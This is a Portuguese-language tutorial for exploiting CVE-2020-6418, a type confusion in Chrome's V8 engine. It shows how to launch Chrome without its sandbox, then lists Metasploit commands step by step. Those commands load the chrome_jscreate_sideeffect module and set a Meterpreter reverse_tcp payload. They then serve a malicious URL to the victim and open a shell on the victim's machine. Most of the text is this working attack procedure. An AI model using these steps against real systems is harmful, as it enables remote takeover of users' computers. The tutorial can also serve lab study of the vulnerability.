
Exploit para CVE-2020-6418, uma confusão de tipo no V8, permitindo execução remota de código via página HTML maliciosa. Usa Metasploit para entregar um payload de reverse shell.
O CVE 2020-6418 trata da confusão de tipos no V8 do Google Chrome. As versões afetadas eram anteriores a 80.0.3987.122. A vulnerabilidade é alcançada por um atacante remoto que acessa o shell de um dispositivo alvo por meio de uma página HTML manipulada.
Nota: O navegador Google Chrome deve ser executado sem sandbox para que o exploit seja bem-sucedido.
i) Crie um atalho para o Google Chrome
ii) Clique em Propriedades > vá até a opção chamada "Target"
iii) No final do EXE, dê um espaço e insira -no--sandbox
iv) Clique em Apply > Ok
v) Abra um novo navegador Google Chrome e você verá o pop-up informando o seguinte.
You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer
Como estamos usando o Kali como ambiente para realizar o exploit, o Metasploit já vem como ferramenta integrada à distribuição. Mas se você estiver usando outras distribuições, será necessário configurar o Metasploit antes de iniciar o exploit.
Consulte a instalação do Metasploit para entender melhor.
i) Iniciando o framework Metasploit
> msfconsole
ii) Encontre o exploit
> search chrome_js
iii) Use o exploit disponível na saída acima
> Use exploit/multi/browser/chrome_jscreate_sideeffect
iv) Forneça o endereço IP do SRVHOST
> set SRVHOST <ip address>
v) Forneça o Target Aqui temos duas opções
> set Target " Number "
vi) Forneça o Payload
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
vii) Para verificar as configurações atuais e as opções habilitadas.
> show options
viii) Para executar o exploit
> run (ou) > exploit
ix) Você receberá uma URL, que deve ser copiada no navegador para que a sessão fique ativa.
x) Quando o usuário acessar a URL, uma sessão será criada. Para verificar isso
> show sessions
xi) Usando a sessão, podemos verificar as informações do sistema do usuário / entrar no shell.
> sessions <number>
> shell